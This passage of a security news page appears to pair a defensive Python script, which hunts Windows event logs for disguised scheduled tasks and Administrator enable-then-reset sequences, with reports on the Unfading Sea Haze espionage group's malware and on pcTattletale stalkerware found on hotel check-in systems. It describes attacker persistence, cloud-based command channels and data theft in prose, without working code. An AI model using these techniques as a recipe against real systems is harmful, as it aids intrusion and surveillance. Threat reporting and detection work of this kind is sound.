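Both persistence behaviours described in the two paragraphs above leave records in the Windows Security log: task creation is logged as event 4698, enabling an account as 4722, and a password reset as 4724, with the built-in local Administrator recognisable by the -500 relative identifier at the end of its SID. The hunt below is an added example, not Bitdefender's code; it runs over constructed sample events (a real deployment would read exported Security log records or a SIEM feed), and the set of Windows file names that a task name is compared against is an assumption for illustration, to be seeded from the host's own System32 listing in practice.

```python
"""Hunt for the two persistence patterns above over Windows Security event records.
Added example (not Bitdefender's tooling); the events and the name list are constructed."""
from datetime import datetime, timedelta

# Assumption for illustration: leaf names of legitimate Windows binaries that a
# scheduled-task name might mimic. Seed from System32 on the host in practice.
WINDOWS_FILE_NAMES = {"svchost", "lsass", "winlogon", "conhost", "explorer", "wuauclt"}

# Constructed sample events. Keys mirror EventData fields of the real Security log
# (4698 = task created, 4722 = account enabled, 4724 = password reset attempt).
EVENTS = [
    {"id": 4698, "time": "2023-04-02T09:14:00", "host": "WS01",
     "task_name": "\\Microsoft\\Windows\\svchost.exe", "subject": "CORP\\jdoe"},
    {"id": 4698, "time": "2023-04-02T09:20:00", "host": "WS01",
     "task_name": "\\BackupNightly", "subject": "CORP\\backupsvc"},
    {"id": 4722, "time": "2023-04-03T01:02:00", "host": "SRV07",
     "target_user": "Administrator", "target_sid": "S-1-5-21-1111-2222-3333-500"},
    {"id": 4724, "time": "2023-04-03T01:03:30", "host": "SRV07",
     "target_user": "Administrator", "target_sid": "S-1-5-21-1111-2222-3333-500"},
    {"id": 4722, "time": "2023-04-05T10:00:00", "host": "SRV07",
     "target_user": "svc_print", "target_sid": "S-1-5-21-1111-2222-3333-1104"},
]


def task_impersonates_windows_file(task_name: str) -> bool:
    """True if the task's leaf name, minus extension, matches a known Windows binary name."""
    leaf = task_name.rsplit("\\", 1)[-1].lower()
    stem = leaf.rsplit(".", 1)[0]
    return stem in WINDOWS_FILE_NAMES


def find_suspicious_tasks(events):
    """4698 events whose task name looks like a Windows file (the page's first pattern)."""
    return [e for e in events
            if e["id"] == 4698 and task_impersonates_windows_file(e["task_name"])]


def find_admin_enable_then_reset(events, window=timedelta(hours=24)):
    """Pair a 4722 (account enabled) with a later 4724 (password reset) on the
    RID-500 account of the same host within `window` (the page's second pattern)."""
    hits = []
    enabled_at = {}  # (host, sid) -> time the account was enabled
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["id"] not in (4722, 4724) or not e["target_sid"].endswith("-500"):
            continue
        key = (e["host"], e["target_sid"])
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 4722:
            enabled_at[key] = t
        elif key in enabled_at and t - enabled_at[key] <= window:
            hits.append({"host": e["host"], "user": e["target_user"],
                         "enabled_at": enabled_at[key].isoformat(), "reset_at": e["time"]})
    return hits


def hunt(events):
    return {"impersonating_tasks": find_suspicious_tasks(events),
            "admin_enable_then_reset": find_admin_enable_then_reset(events)}


if __name__ == "__main__":
    for finding, items in hunt(EVENTS).items():
        print(finding)
        for item in items:
            print("  ", item)
```

On the constructed input the hunt flags the `svchost.exe` task and the enable-then-reset sequence on SRV07, while ignoring the legitimately named backup task and the unrelated service account. Pairing 4722 with 4724 rather than alerting on either alone keeps the rule quiet during routine administration, and the 24-hour window is a starting point to tune per environment.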

Unfading Sea Haze has notably begun using Remote Monitoring and Management (RMM) tools, particularly ITarian RMM, since at least September 2022 to compromise targets’ networks. This approach represents a significant shift from typical nation-state tactics. Additionally, experts collected evidence that they may have established persistence on web servers, such as Windows IIS and Apache httpd, likely using web shells or malicious modules. However, the exact persistence mechanisms remain unclear due to insufficient forensic data.

The Chinese threat actor has developed a sophisticated collection of custom malware and hacking tools. Since at least 2018, the group has used SilentGh0st, TranslucentGh0st, and three variants of the .NET agent SharpJSHandler supported by Ps2dllLoader. In 2023, it replaced Ps2dllLoader with a new mechanism using msbuild.exe and C# payloads from a remote SMB share. The attackers also replaced fully featured Gh0stRat variants with more modular, plugin-based versions called FluffyGh0st, InsidiousGh0st (available in C++, C#, and Go), and EtherealGh0st.

“One of the payloads delivered by Ps2dllLoader is SharpJSHandler.” reads the report. “SharpJSHandler operates by listening for HTTP requests. Upon receiving a request, it executes the encoded JavaScript code using the Microsoft.JScript library.

Our investigation also uncovered two additional variations that utilize cloud storage services for communication instead of direct HTTP requests. We have found variations for DropBox and for OneDrive. In this case, SharpJSHandler retrieves the payload periodically from a DropBox/OneDrive account, executes it, and uploads the resulting output back to the same location.

These cloud-based communication methods present a potential challenge for detection as they avoid traditional web shell communication channels.”

The threat actors used both custom malware and off-the-shelf tools to gather sensitive data from victim machines.

One of the tools used for data collection is a keylogger called xkeylog; the group also used a web browser data stealer, a tool to monitor the presence of portable devices, and a custom tool named DustyExfilTool.

The attackers are also able to target messaging applications like Telegram and Viber. They first terminate the processes for these apps (telegram.exe and viber.exe), then use rar.exe to archive the application data.

“The Unfading Sea Haze threat actor group has demonstrated a sophisticated approach to cyberattacks. Their custom malware arsenal, including the Gh0st RAT family and Ps2dllLoader, showcases a focus on flexibility and evasion techniques.” concludes the report. “The observed shift towards modularity, dynamic elements, and in-memory execution highlights their efforts to bypass traditional security measures. Attackers are constantly adapting their tactics, necessitating a layered security approach.”

Pierluigi Paganini

(SecurityAffairs – hacking, China)

A consumer-grade spyware app found in check-in systems of 3 US hotels

23 May 2024 at 06:27

A researcher discovered a consumer-grade spyware app on the check-in systems of at least three Wyndham hotels across the US.

The security researcher Eric Daigle discovered a commercial spyware app, called pcTattletale, on the check-in systems of at least three Wyndham hotels across the US, TechCrunch first reported. The app is often used by parents to monitor their children’s online activities or by employers to keep track of employee productivity and internet usage.

Daigle discovered the commercial surveillance software on the hotel check-in systems while investigating consumer-grade spyware (aka stalkerware). 

pcTattletale is a software program designed for monitoring and recording the activities of computer users.

The software was used by someone to capture screenshots of the hotel booking systems, including guest details. Daigle also discovered a vulnerability in the monitoring software that allows anyone to access the screenshots taken by the app.

“PCTattletale is a simple stalkerware app. Rather than the sophisticated monitoring of many similarly insecure competitors it simply asks for permission to record the targeted device (Android and Windows are supported) on infection. Afterward the observer can log in to an online portal and activate recording, at which point a screen capture is taken on the device and played on the target’s browser.” wrote Daigle in a post. “I recently discovered a serious vulnerability in PCTattletale’s API allowing any attacker to obtain the most recent screen capture recorded from any device on which PCTattletale is installed. It is distinct from the IDOR previously discovered by Jo Coscia, and makes it trivial to actually obtain captures from other devices.”

Daigle attempted to report the flaw to pcTattletale, but the company has not responded. He shared limited details about the screenshot bug in a blog post, intentionally omitting specifics to prevent malicious exploitation.

“The screenshots from two Wyndham hotels, seen by TechCrunch, show the names and reservation details of guests on a web portal provided by travel tech giant Sabre. The screenshots of the web portals also display guests’ partial payment card numbers.” reported TechCrunch. “Another screenshot showed access to a third Wyndham hotel’s check-in system, which at the time was logged into Booking.com’s administration portal used to manage a guest’s reservation.”

It’s unclear who installed the malware on the hotel systems and what their motivation was.

Pierluigi Paganini

(SecurityAffairs – hacking, consumer-grade spyware app)
